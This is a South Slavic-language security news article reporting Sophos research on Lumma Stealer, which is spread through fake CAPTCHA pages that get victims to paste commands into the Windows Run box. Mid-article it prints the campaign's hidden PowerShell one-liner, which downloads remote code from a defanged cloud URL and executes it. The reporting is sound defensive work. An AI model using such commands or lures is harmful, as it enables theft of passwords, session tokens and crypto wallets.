Lumma Stealer, maliciozni malver za krađu informacija koji je aktivan od sredine 2022. godine, značajno je unaprijedio svoje taktike, tehnike i procedure u posljednjim mjesecima.
Vjeruje se da potiče od ruski govorećih sajber kriminalaca, a i dalje se distribuiše kao Malware-as-a-Service (MaaS) — usluga u kojoj programeri nude redovne nadogradnje i podršku putem Telegram kanala i posvećenog Gitbook sajta.
Ova prijetnja sve je češća u izvještajima o sajber bezbjednosti, a hiljade infekcija zabilježene su samo u protekloj godini.
Primarni ciljevi malvera su vrijedni korisnički podaci, uključujući lozinke, sesijske tokene, kripto novčanike i lične informacije sa kompromitovanih uređaja.
Ono što Lumma čini posebno opasnom jeste njena sofisticiranost u metodama isporuke, koje su nedavno proširene na socijalni inženjering pomoću lažnih CAPTCHA provjera i obmanjujućih uputa za preuzimanje.
Ove metode iskorištavaju korisničko povjerenje u poznate sigurnosne provjere, navodeći žrtve da same izvrše maliciozne komande na svojim sistemima.
Istraživači iz Sophosa identifikovali su više Lumma Stealer kampanja tokom jeseni i zime 2024–2025. godine, dokumentujući kako se taktike malvera razvijaju da bi izbjegle detekciju.
Tok napada
Jedna posebno zabrinjavajuća inovacija uključuje zloupotrebu Windows PowerShell-a preko lažnih CAPTCHA stranica za verifikaciju.
.webp)
Poznato polje za verifikaciju (Izvor – Sophos)
U ovom lancu napada, žrtve koje posjete maliciozne sajtove suočavaju se sa klasičnim “Nisam robot” verifikacionim okvirom, što stvara lažni osjećaj sigurnosti i legitimnosti.
Nakon što kliknu na okvir za verifikaciju, korisnici bivaju preusmjereni na drugu stranicu koja ih upućuje da otvore komandu “Pokreni” (Run) u Windowsu, a zatim pritisnu Ctrl+V i Enter.
.webp)
Ova naizgled bezopasna radnja zapravo nalijepi i izvrši skrivenu PowerShell komandu u pozadini:
C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -
command $uR= hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/n
ew-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t
=$reS.Content; iex $t
.webp)
Izvršavanjem ove komande pokreće se sofisticirani višestepeni napad. Skripta preuzima dodatne komponente malvera sa komandno-kontrolnih servera, koje zatim preuzima, raspakuje i pokreće osnovni Lumma Stealer.
Kada se aktivira, malver sistematski pristupa podacima iz pretraživača — kao što se vidi na slici 6, gdje Autolt3.exe pristupa lozinkama i kolačićima iz Chrome-a.
Ono što ovaj napad čini posebno efikasnim jeste upotreba AES enkripcije za prikrivanje narednih komponenti malvera.
Malver koristi sofisticirane tehnike obfuskacije, uključujući početne vektore i kompleksne dekripcijske rutine, kako bi zaobišao tradicionalne mjere bezbjednosti.
Ova kombinacija socijalnog inženjeringa i naprednih tehničkih metoda predstavlja značajnu evoluciju sposobnosti Lumma Stealera.
Preporuke
Stručnjaci za sajber bezbjednost preporučuju upotrebu robusnih rješenja za zaštitu krajnjih tačaka koja uključuju analizu ponašanja, jer detekcija zasnovana na potpisima nije dovoljna za ovakve napade.
Takođe, organizacije treba da edukuju korisnike o rizicima CAPTCHA izazova koji traže neobične radnje — posebno one koje uključuju pokretanje komandi ili skripti.
Izvor: CyberSecurityNews